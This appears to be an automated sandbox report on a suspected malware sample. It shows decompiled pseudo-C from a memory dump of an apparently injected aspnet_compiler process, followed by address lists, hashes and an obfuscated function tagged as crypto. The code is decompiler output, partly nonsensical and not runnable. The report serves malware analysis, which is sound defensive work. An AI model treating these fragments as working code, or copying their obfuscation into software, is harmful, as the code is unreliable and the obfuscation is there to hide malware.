							 *(_t330 + 0x3c) = _t284;
							_t286 = 0;
							 *((short*)(_t330 + 0x30)) = _v48;
							__eflags = _t312;
							if(_t312 != 0) {
								 *(_t330 + 0x18) = _t325;
								__eflags = _t312 - 0x1978478;
								 *_t330 = ((0 | _t312 == 0x01978478) - 0x00000001 & 0xfffffffb) + 7;
								E018CF3E0(_t325,  *((intOrPtr*)(_t312 + 4)),  *_t312 & 0x0000ffff);
								_t312 = _v32;
								_t340 = _t340 + 0xc;
								_t286 = 1;
								__eflags = _a8;
								_t325 = _t325 + (( *_t312 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t277 = E019139F2(_t325);
									_t312 = _v32;
									_t325 = _t277;
								}
							}
							_t296 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t331 = _v68;
								__eflags = 0;
								 *((short*)(_t325 - 2)) = 0;
								goto L32;
							} else {
								_t284 = _t330 + _t286 * 4;
								_v56 = _t284;
								do {
									__eflags = _t312;
									if(_t312 != 0) {
										_t240 =  *(_v60 + _t296 * 4);
										__eflags = _t240;
										if(_t240 == 0) {
											goto L30;
										} else {
											__eflags = _t240 == 5;
											if(_t240 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t284 =  *(_v60 + _t296 * 4);
										 *(_t284 + 0x18) = _t325;
										_t244 =  *(_v60 + _t296 * 4);
										__eflags = _t244 - 8;
										if(_t244 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t244 * 4 +  &M018B2959))) {
												case 0:
													__ax =  *0x1978488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E018CF3E0(__edi,  *0x197848c, __ax & 0x0000ffff);
														__eax =  *0x1978488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E018CF3E0(_t325, _v80, _v64);
													_t272 = _v64;
													goto L26;
												case 2:
													 *0x1978480 & 0x0000ffff = E018CF3E0(__edi,  *0x1978484,  *0x1978480 & 0x0000ffff);
													__eax =  *0x1978480 & 0x0000ffff;
													__eax = ( *0x1978480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E018CF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E018CF3E0(_t325, _v76, _v36);
														_t272 = _v36;
													}
													L26:
													_t340 = _t340 + 0xc;
													_t325 = _t325 + (_t272 >> 1) * 2 + 2;
													__eflags = _t325;
													L27:
													_push(0x3b);
													_pop(_t274);
													 *((short*)(_t325 - 2)) = _t274;
													goto L28;
												case 6:
													__ebx = "\\W;w\\W;w";
													__eflags = __ebx - "\\W;w\\W;w";
													if(__ebx != "\\W;w\\W;w") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E018CF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\W;w\\W;w";
														} while (__ebx != "\\W;w\\W;w");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1978478 & 0x0000ffff = E018CF3E0(__edi,  *0x197847c,  *0x1978478 & 0x0000ffff);
													__eax =  *0x1978478 & 0x0000ffff;
													__eax = ( *0x1978478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E019139F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1976e58 & 0x0000ffff = E018CF3E0(__edi,  *0x1976e5c,  *0x1976e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1976e58 & 0x0000ffff;
													__eax = ( *0x1976e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t296 = _v16;
													_t312 = _v32;
													L29:
													_t284 = _t284 + 4;
													__eflags = _t284;
													_v56 = _t284;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t296 = _t296 + 1;
									_v16 = _t296;
									__eflags = _t296 - _v48;
								} while (_t296 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t279 =  *(_v60 + _t323 * 4);
						if(_t279 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t279 * 4 +  &M018B2935))) {
							case 0:
								__ax =  *0x1978488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t312 =  &_v64;
								_v80 = L018B2E3E(0,  &_v64);
								_t284 = _t284 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1978480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1978480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = L0189EEF0(0x19779a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0189EB70(__ecx, 0x19779a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t218 = _v72;
											__eflags = _t218;
											if(_t218 != 0) {
												L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
											}
											_t219 = _v52;
											__eflags = _t219;
											if(_t219 != 0) {
												__eflags = _t331;
												if(_t331 < 0) {
													L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
													_t219 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t292 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1977b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L018A4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0189EB70(__ecx, 0x19779a0);
										__eax = _v52;
										L36:
										_pop(_t324);
										_pop(_t332);
										__eflags = _v8 ^ _t337;
										_pop(_t285);
										return L018CB640(_t219, _t285, _v8 ^ _t337, _t312, _t324, _t332);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t280 = _v56;
								if(_v56 != 0) {
									_t312 =  &_v36;
									_t282 = L018B2E3E(_t280,  &_v36);
									_t292 = _v36;
									_v76 = _t282;
								}
								if(_t292 == 0) {
									goto L44;
								} else {
									_t284 = _t284 + 2 + _t292;
								}
								goto L14;
							case 6:
								__eax =  *0x1975764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1978478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1978478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1976e58 & 0x0000ffff;
								__eax = ( *0x1976e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t323 = _t323 + 1;
								if(_t323 >= _v48) {
									goto L16;
								} else {
									_t312 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t297 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("o16 sub [ebx-0x74d81fff], cl");
					 *_t330 =  *_t330 + _t337;
					_t333 = _t330 + 1;
					 *((intOrPtr*)(_t284 - 0x74d9faff)) =  *((intOrPtr*)(_t284 - 0x74d9faff)) - _t297;
					 *_t325 =  *_t325 + _t284;
					_pop(_t288);
					_pop( *__ecx);
					_t342 =  *[es:ecx];
					 *((intOrPtr*)(_t288 - 0x70a4caff)) =  *((intOrPtr*)(_t288 - 0x70a4caff)) - _t297;
					 *_t312 =  *_t312 + _t340;
					 *((intOrPtr*)(_t288 - 0x74d77fff)) =  *((intOrPtr*)(_t288 - 0x74d77fff)) - _t297;
					_t334 = _t330 + 1 + _t333;
					asm("daa");
					 *((intOrPtr*)(_t288 - 0x74d7b1ff)) =  *((intOrPtr*)(_t288 - 0x74d7b1ff)) - _t297;
					_a35 = _a35 + _t288;
					asm("fcomp dword [ebx-0x71]");
					 *((intOrPtr*)( *_t297 +  &_a1546912135)) =  *((intOrPtr*)( *_t297 +  &_a1546912135)) + _t330 + 1 + _t333;
					 *__ecx = ds;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x195ff00);
					E018DD08C(_t288, _t325, _t334);
					_v44 =  *[fs:0x18];
					_t326 = 0;
					 *_a24 = 0;
					_t289 = _a12;
					__eflags = _t289;
					if(_t289 == 0) {
						_t252 = 0xc0000100;
					} else {
						_v8 = 0;
						_t335 = 0xc0000100;
						_v52 = 0xc0000100;
						_t254 = 4;
						while(1) {
							_v40 = _t254;
							__eflags = _t254;
							if(_t254 == 0) {
								break;
							}
							_t302 = _t254 * 0xc;
							_v48 = _t302;
							__eflags = _t289 -  *((intOrPtr*)(_t302 + 0x1861664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t269 = E018CE5C0(_a8,  *((intOrPtr*)(_t302 + 0x1861668)), _t289);
									_t342 = _t342 + 0xc;
									__eflags = _t269;
									if(__eflags == 0) {
										_t335 = E019051BE(_t289,  *((intOrPtr*)(_v48 + 0x186166c)), _a16, _t326, _t335, __eflags, _a20, _a24);
										_v52 = _t335;
										break;
									} else {
										_t254 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t254 = _t254 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t335;
						__eflags = _t335;
						if(_t335 < 0) {
							__eflags = _t335 - 0xc0000100;
							if(_t335 == 0xc0000100) {
								_t298 = _a4;
								__eflags = _t298;
								if(_t298 != 0) {
									_v36 = _t298;
									__eflags =  *_t298 - _t326;
									if( *_t298 == _t326) {
										_t335 = 0xc0000100;
										goto L76;
									} else {
										_t314 =  *((intOrPtr*)(_v44 + 0x30));
										_t256 =  *((intOrPtr*)(_t314 + 0x10));
										__eflags =  *((intOrPtr*)(_t256 + 0x48)) - _t298;
										if( *((intOrPtr*)(_t256 + 0x48)) == _t298) {
											__eflags =  *(_t314 + 0x1c);
											if( *(_t314 + 0x1c) == 0) {
												L106:
												_t335 = E018B2AE4( &_v36, _a8, _t289, _a16, _a20, _a24);
												_v32 = _t335;
												__eflags = _t335 - 0xc0000100;
												if(_t335 != 0xc0000100) {
													goto L69;
												} else {
													_t326 = 1;
													_t298 = _v36;
													goto L75;
												}
											} else {
												_t259 = L01896600( *(_t314 + 0x1c));
												__eflags = _t259;
												if(_t259 != 0) {
													goto L106;
												} else {
													_t298 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t335 = L018B2C50(_t298, _a8, _t289, _a16, _a20, _a24, _t326);
											L76:
											_v32 = _t335;
											goto L69;
										}
									}
									goto L108;
								} else {
									L0189EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t335 = _a24;
									_t266 = E018B2AE4( &_v36, _a8, _t289, _a16, _a20, _t335);
									_v32 = _t266;
									__eflags = _t266 - 0xc0000100;
									if(_t266 == 0xc0000100) {
										_v32 = L018B2C50(_v36, _a8, _t289, _a16, _a20, _t335, 1);
									}
									_v8 = _t326;
									E018B2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t252 = _t335;
					}
					L70:
					return E018DD0D1(_t252);
				}
				L108:
			}



















































                                                  0x018b2584
                                                  0x018b2586
                                                  0x018b2590
                                                  0x018b2596
                                                  0x018b2597
                                                  0x018b2598
                                                  0x018b2599
                                                  0x018b259e
                                                  0x018b25a4
                                                  0x018b25a9
                                                  0x018b25ac
                                                  0x018b25ae
                                                  0x018b25b1
                                                  0x018b25b2
                                                  0x018b25b5
                                                  0x018b25b8
                                                  0x018b25bb
                                                  0x018b25bc
                                                  0x018b25bf
                                                  0x018b25c2
                                                  0x018b25c5
                                                  0x018b25c6
                                                  0x018b25cb
                                                  0x018b25ce
                                                  0x018b25d8
                                                  0x018b25dd
                                                  0x018b25de
                                                  0x018b25e1
                                                  0x018b25e3
                                                  0x018b25e9
                                                  0x018b26da
                                                  0x018b26da
                                                  0x018b26dd
                                                  0x018b26e2
                                                  0x018f5b56
                                                  0x00000000
                                                  0x018b26e8
                                                  0x018b26f9
                                                  0x018b26fb
                                                  0x018b26fe
                                                  0x018b2700
                                                  0x018f5b60
                                                  0x00000000
                                                  0x018b2706
                                                  0x018b2706
                                                  0x018b270a
                                                  0x018b270a
                                                  0x018b270d
                                                  0x018b2713
                                                  0x018b2716
                                                  0x018b2718
                                                  0x018b271c
                                                  0x018b271e
                                                  0x018f5b6c
                                                  0x018f5b6f
                                                  0x018f5b7f
                                                  0x018f5b89
                                                  0x018f5b8e
                                                  0x018f5b93
                                                  0x018f5b96
                                                  0x018f5b9c
                                                  0x018f5ba0
                                                  0x018f5ba3
                                                  0x018f5bab
                                                  0x018f5bb0
                                                  0x018f5bb3
                                                  0x018f5bb3
                                                  0x018f5ba3
                                                  0x018b2724
                                                  0x018b2726
                                                  0x018b2729
                                                  0x018b272c
                                                  0x018b279d
                                                  0x018b279d
                                                  0x018b27a0
                                                  0x018b27a2
                                                  0x00000000
                                                  0x018b272e
                                                  0x018b272e
                                                  0x018b2731
                                                  0x018b2734
                                                  0x018b2734
                                                  0x018b2736
                                                  0x018f5bc1
                                                  0x018f5bc1
                                                  0x018f5bc4
                                                  0x00000000
                                                  0x018f5bca
                                                  0x018f5bca
                                                  0x018f5bcd
                                                  0x00000000
                                                  0x018f5bd3
                                                  0x00000000
                                                  0x018f5bd3
                                                  0x018f5bcd
                                                  0x018b273c
                                                  0x018b273c
                                                  0x018b2742
                                                  0x018b2747
                                                  0x018b274a
                                                  0x018b274d
                                                  0x018b2750
                                                  0x00000000
                                                  0x018b2756
                                                  0x018b2756
                                                  0x00000000
                                                  0x018b2902
                                                  0x018b2908
                                                  0x018b290b
                                                  0x00000000
                                                  0x018b2911
                                                  0x018b291c
                                                  0x018b2921
                                                  0x00000000
                                                  0x018b2921
                                                  0x00000000
                                                  0x00000000
                                                  0x018b2880
                                                  0x018b2887
                                                  0x018b288c
                                                  0x00000000
                                                  0x00000000
                                                  0x018b2805
                                                  0x018b280a
                                                  0x018b2814
                                                  0x018b2816
                                                  0x00000000
                                                  0x00000000
                                                  0x018b281e
                                                  0x018b2821
                                                  0x018b2823
                                                  0x00000000
                                                  0x018b2829
                                                  0x018b2829
                                                  0x018b2831
                                                  0x018b283c
                                                  0x018b283e
                                                  0x00000000
                                                  0x018b283e
                                                  0x00000000
                                                  0x00000000
                                                  0x018b284e
                                                  0x018b2850
                                                  0x018b2851
                                                  0x018b2854
                                                  0x018b2857
                                                  0x018b285a
                                                  0x018b285c
                                                  0x018b285d
                                                  0x00000000
                                                  0x00000000
                                                  0x018b275d
                                                  0x018b2761
                                                  0x00000000
                                                  0x018b2767
                                                  0x018b276e
                                                  0x018b2773
                                                  0x018b2773
                                                  0x018b2776
                                                  0x018b2778
                                                  0x018b277e
                                                  0x018b277e
                                                  0x018b2781
                                                  0x018b2781
                                                  0x018b2783
                                                  0x018b2784
                                                  0x00000000
                                                  0x00000000
                                                  0x018f5bd8
                                                  0x018f5bde
                                                  0x018f5be4
                                                  0x018f5be6
                                                  0x018f5be8
                                                  0x018f5be9
                                                  0x018f5bee
                                                  0x018f5bf8
                                                  0x018f5bff
                                                  0x018f5c01
                                                  0x018f5c04
                                                  0x018f5c07
                                                  0x018f5c0b
                                                  0x018f5c0d
                                                  0x018f5c0d
                                                  0x018f5c15
                                                  0x018f5c18
                                                  0x018f5c1b
                                                  0x018f5c1b
                                                  0x018f5c1e
                                                  0x00000000
                                                  0x00000000
                                                  0x018b28c3
                                                  0x018b28c8
                                                  0x018b28d2
                                                  0x018b28d4
                                                  0x018b28d8
                                                  0x018b28db
                                                  0x018f5c26
                                                  0x018f5c28
                                                  0x018f5c2d
                                                  0x018f5c2d
                                                  0x00000000
                                                  0x00000000
                                                  0x018f5c34
                                                  0x018f5c36
                                                  0x018f5c49
                                                  0x018f5c4e
                                                  0x018f5c54
                                                  0x018f5c5b
                                                  0x018f5c5d
                                                  0x018f5c60
                                                  0x018b2788
                                                  0x018b2788
                                                  0x018b278b
                                                  0x018b278e
                                                  0x018b278e
                                                  0x018b278e
                                                  0x018b2791
                                                  0x00000000
                                                  0x00000000
                                                  0x018b2756
                                                  0x018b2750
                                                  0x00000000
                                                  0x018b2794
                                                  0x018b2794
                                                  0x018b2795
                                                  0x018b2798
                                                  0x018b2798
                                                  0x00000000
                                                  0x018b2734
                                                  0x018b272c
                                                  0x018b2700
                                                  0x018b25ef
                                                  0x018b25ef
                                                  0x018b25ef
                                                  0x018b25f2
                                                  0x018b25f8
                                                  0x00000000
                                                  0x00000000
                                                  0x018b25fe
                                                  0x00000000
                                                  0x018b28e6
                                                  0x018b28ec
                                                  0x018b28ef
                                                  0x018b28f5
                                                  0x018b28f8
                                                  0x018b28f8
                                                  0x00000000
                                                  0x018b28f8
                                                  0x00000000
                                                  0x00000000
                                                  0x018b2866
                                                  0x018b2866
                                                  0x018b2876
                                                  0x018b2879
                                                  0x00000000
                                                  0x00000000
                                                  0x018b27e0
                                                  0x018b27e7
                                                  0x018b27e9
                                                  0x018b27eb
                                                  0x018f5afd
                                                  0x00000000
                                                  0x018f5afd
                                                  0x00000000
                                                  0x00000000
                                                  0x018b2633
                                                  0x018b2638
                                                  0x018b263b
                                                  0x018b263c
                                                  0x018b263e
                                                  0x018b2640
                                                  0x018b2642
                                                  0x018b2647
                                                  0x018b2649
                                                  0x018b264e
                                                  0x018b2650
                                                  0x018b2653
                                                  0x018b2659
                                                  0x018b26a2
                                                  0x018b26a7
                                                  0x018b26ac
                                                  0x018b26b2
                                                  0x018f5b11
                                                  0x018f5b15
                                                  0x018f5b17
                                                  0x00000000
                                                  0x018b26b8
                                                  0x018b26b8
                                                  0x018b26ba
                                                  0x018b27a6
                                                  0x018b27a6
                                                  0x018b27a9
                                                  0x018b27ab
                                                  0x018b27b9
                                                  0x018b27b9
                                                  0x018b27be
                                                  0x018b27c1
                                                  0x018b27c3
                                                  0x018b27c5
                                                  0x018b27c7
                                                  0x018f5c74
                                                  0x018f5c79
                                                  0x018f5c79
                                                  0x018b27c7
                                                  0x00000000
                                                  0x018b26c0
                                                  0x018b26c0
                                                  0x018b26c3
                                                  0x018b26c6
                                                  0x018b26c6
                                                  0x018b26c9
                                                  0x018b26c9
                                                  0x00000000
                                                  0x018b26c9
                                                  0x018b26ba
                                                  0x018b265b
                                                  0x018b265b
                                                  0x018b265e
                                                  0x018b2667
                                                  0x018b266d
                                                  0x018b2677
                                                  0x018b267c
                                                  0x018b267f
                                                  0x018b2681
                                                  0x018f5b49
                                                  0x018f5b4e
                                                  0x018b27cd
                                                  0x018b27d0
                                                  0x018b27d1
                                                  0x018b27d2
                                                  0x018b27d4
                                                  0x018b27dd
                                                  0x018b2687
                                                  0x018b2687
                                                  0x018b268a
                                                  0x018b268b
                                                  0x018b268e
                                                  0x018b268f
                                                  0x018b2691
                                                  0x018b2696
                                                  0x018b2698
                                                  0x018b269d
                                                  0x018b269f
                                                  0x00000000
                                                  0x018b269f
                                                  0x018b2681
                                                  0x00000000
                                                  0x00000000
                                                  0x018b2846
                                                  0x00000000
                                                  0x00000000
                                                  0x018b2605
                                                  0x018b260a
                                                  0x018b260c
                                                  0x018b2611
                                                  0x018b2616
                                                  0x018b2619
                                                  0x018b2619
                                                  0x018b261e
                                                  0x00000000
                                                  0x018b2624
                                                  0x018b2627
                                                  0x018b2627
                                                  0x00000000
                                                  0x00000000
                                                  0x018f5b1f
                                                  0x00000000
                                                  0x00000000
                                                  0x018b2894
                                                  0x018b289b
                                                  0x018b289d
                                                  0x018b28a1
                                                  0x018f5b2b
                                                  0x018f5b2e
                                                  0x018f5b2e
                                                  0x018b28a7
                                                  0x018b28a9
                                                  0x018f5b04
                                                  0x018f5b09
                                                  0x018f5b09
                                                  0x018f5b09
                                                  0x00000000
                                                  0x00000000
                                                  0x018f5b35
                                                  0x018f5b3c
                                                  0x018b28fb
                                                  0x018b28fb
                                                  0x018b26cc
                                                  0x018b26cc
                                                  0x018b26d0
                                                  0x00000000
                                                  0x018b26d2
                                                  0x018b26d2
                                                  0x00000000
                                                  0x018b26d2
                                                  0x00000000
                                                  0x00000000
                                                  0x018b25fe
                                                  0x018b292d
                                                  0x018b292f
                                                  0x018b2930
                                                  0x018b2935
                                                  0x018b2939
                                                  0x018b2940
                                                  0x018b2945
                                                  0x018b2946
                                                  0x018b294c
                                                  0x018b294e
                                                  0x018b294f
                                                  0x018b2951
                                                  0x018b2952
                                                  0x018b2958
                                                  0x018b295a
                                                  0x018b2960
                                                  0x018b2962
                                                  0x018b2966
                                                  0x018b296c
                                                  0x018b2971
                                                  0x018b2974
                                                  0x018b297b
                                                  0x018b297d
                                                  0x018b297e
                                                  0x018b297f
                                                  0x018b2980
                                                  0x018b2981
                                                  0x018b2982
                                                  0x018b2983
                                                  0x018b2984
                                                  0x018b2985
                                                  0x018b2986
                                                  0x018b2987
                                                  0x018b2988
                                                  0x018b2989
                                                  0x018b298a
                                                  0x018b298b
                                                  0x018b298c
                                                  0x018b298d
                                                  0x018b298e
                                                  0x018b298f
                                                  0x018b2990
                                                  0x018b2992
                                                  0x018b2997
                                                  0x018b29a3
                                                  0x018b29a6
                                                  0x018b29ab
                                                  0x018b29ad
                                                  0x018b29b0
                                                  0x018b29b2
                                                  0x018f5c80
                                                  0x018b29b8
                                                  0x018b29b8
                                                  0x018b29bb
                                                  0x018b29c0
                                                  0x018b29c5
                                                  0x018b29c6
                                                  0x018b29c6
                                                  0x018b29c9
                                                  0x018b29cb
                                                  0x00000000
                                                  0x00000000
                                                  0x018b29cd
                                                  0x018b29d0
                                                  0x018b29d9
                                                  0x018b29db
                                                  0x018b29dd
                                                  0x018b2a7f
                                                  0x018b2a84
                                                  0x018b2a87
                                                  0x018b2a89
                                                  0x018f5ca1
                                                  0x018f5ca3
                                                  0x00000000
                                                  0x018b2a8f
                                                  0x018b2a8f
                                                  0x00000000
                                                  0x018b2a8f
                                                  0x00000000
                                                  0x018b29e3
                                                  0x018b29e3
                                                  0x018b29e3
                                                  0x00000000
                                                  0x018b29e3
                                                  0x018b29dd
                                                  0x00000000
                                                  0x018b29db
                                                  0x018b29e6
                                                  0x018b29e9
                                                  0x018b29eb
                                                  0x018b29ed
                                                  0x018b29f3
                                                  0x018b29f5
                                                  0x018b29f8
                                                  0x018b29fa
                                                  0x018b2a97
                                                  0x018b2a9a
                                                  0x018b2a9d
                                                  0x018b2add
                                                  0x00000000
                                                  0x018b2a9f
                                                  0x018b2aa2
                                                  0x018b2aa5
                                                  0x018b2aa8
                                                  0x018b2aab
                                                  0x018f5cab
                                                  0x018f5caf
                                                  0x018f5cc5
                                                  0x018f5cda
                                                  0x018f5cdc
                                                  0x018f5cdf
                                                  0x018f5ce5
                                                  0x00000000
                                                  0x018f5ceb
                                                  0x018f5ced
                                                  0x018f5cee
                                                  0x00000000
                                                  0x018f5cee
                                                  0x018f5cb1
                                                  0x018f5cb4
                                                  0x018f5cb9
                                                  0x018f5cbb
                                                  0x00000000
                                                  0x018f5cbd
                                                  0x018f5cbd
                                                  0x00000000
                                                  0x018f5cbd
                                                  0x018f5cbb
                                                  0x018b2ab1
                                                  0x018b2ab1
                                                  0x018b2ac4
                                                  0x018b2ac6
                                                  0x018b2ac6
                                                  0x00000000
                                                  0x018b2ac6
                                                  0x018b2aab
                                                  0x00000000
                                                  0x018b2a00
                                                  0x018b2a09
                                                  0x018b2a0e
                                                  0x018b2a21
                                                  0x018b2a24
                                                  0x018b2a35
                                                  0x018b2a3a
                                                  0x018b2a3d
                                                  0x018b2a42
                                                  0x018b2a59
                                                  0x018b2a59
                                                  0x018b2a5c
                                                  0x018b2a5f
                                                  0x018b2a5f
                                                  0x018b29fa
                                                  0x018b29f3
                                                  0x018b2a64
                                                  0x018b2a64
                                                  0x018b2a6b
                                                  0x018b2a6b
                                                  0x018b2a6d
                                                  0x018b2a72
                                                  0x018b2a72
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PATH
                                                  • API String ID: 0-1036084923
                                                  • Opcode ID: 97fb06d679516c3324577ca5b698c51517fe9c1edffe3a124e3edf07b3b98a28
                                                  • Instruction ID: 47fcdfd3a024c5afc412bda89606979587456741b5762792edbb87e1a54ea28c
                                                  • Opcode Fuzzy Hash: 97fb06d679516c3324577ca5b698c51517fe9c1edffe3a124e3edf07b3b98a28
                                                  • Instruction Fuzzy Hash: 1CC18F71D00219EBDB25DFA9D8C1AEDBBB2FF48744F044029E501EB350E774AA46CB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041BCCB Relevance: 1.6, Strings: 1, Instructions: 324COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 50%
                                                  			E0041BCCB(void* __eax, signed int __ebx, signed char __ecx, signed int __edx, void* __edi, signed int __esi) {
				intOrPtr _t42;
				signed char _t45;
				signed char _t46;
				intOrPtr _t52;
				void* _t57;
				void* _t58;
				void* _t59;
				signed char _t64;
				char _t69;
				signed int _t71;
				signed int _t80;
				signed int _t86;
				signed int _t101;

				_t71 = __edx;
				_t64 = __ecx;
				_t80 = __edi -  *0xac200fda &  *0x9484b2be;
				asm("ror dword [0x2ddee4c5], 0xde");
				asm("scasd");
				 *0x7107328a =  *0x7107328a | __ebx;
				 *0xb92ef992 =  *0xb92ef992 << 0xe5;
				asm("stosb");
				 *0x890de225 = __ebx +  *0x3df11bc5;
				 *0x8e5989ce =  *0x8e5989ce ^ _t101;
				_t86 = __esi | 0x0aa26935;
				asm("rcr dword [0x5cb56cd4], 0x91");
				if(_t86 > 0) {
					__esp =  *0x91b82c7e * 0x19c2;
					asm("sbb edi, [0xa5605c8f]");
					if(__esp != 0) {
						__ecx = __ecx |  *0x934d6874;
						__ebp = __ebp ^  *0x5c545a2b;
						__eax = __eax |  *0xeca9dded;
						__bl = __bl | 0x0000001a;
						__dh = __dh ^ 0x000000b1;
						 *0x3d3b6f14 =  *0x3d3b6f14 + __dl;
						__ebx = __ebx + 1;
						__esi = __esi |  *0xca230ece;
						asm("adc [0xe9516dd0], ah");
						if(__esi == 0) {
							asm("sbb [0x1c4fcb7b], ebp");
							__edi = __edi - 1;
							asm("adc ecx, [0x3e999d8e]");
							__esi = __esi ^  *0x53311b27;
							_push( *0x46e120fb);
							_push(__ebp);
							__esi = __esi &  *0xf465303d;
							 *0x7affd588 =  *0x7affd588 << 0xac;
							__dl = __dl - 0x2c;
							if(__dl < 0) {
								__ecx =  *0x1551a973;
								asm("sbb ecx, 0x2ac9f6f1");
								_push(__ebx);
								if(__edi <= 0x6667bfa) {
									__ebx =  *0xf6012d7f * 0x1b0a;
									asm("ror byte [0x503343a], 0x11");
									__ecx =  *0x2d328860 * 0x181f;
									 *0xc0cb1f6f =  *0xc0cb1f6f | __edi;
									 *0xd7b74199 =  *0xd7b74199 & __ebx;
									asm("rcr dword [0xe108da81], 0x88");
									 *0x553926b * 0xe716 =  *0x553926b * 0x0000e716 |  *0x59c0f29;
									_push( *0x173e052e);
									asm("adc ebx, 0xbdee059c");
									asm("adc ecx, 0x59cf8fe");
									__dh = 0xc6;
									__bh = __bh +  *0x9c0c14b2;
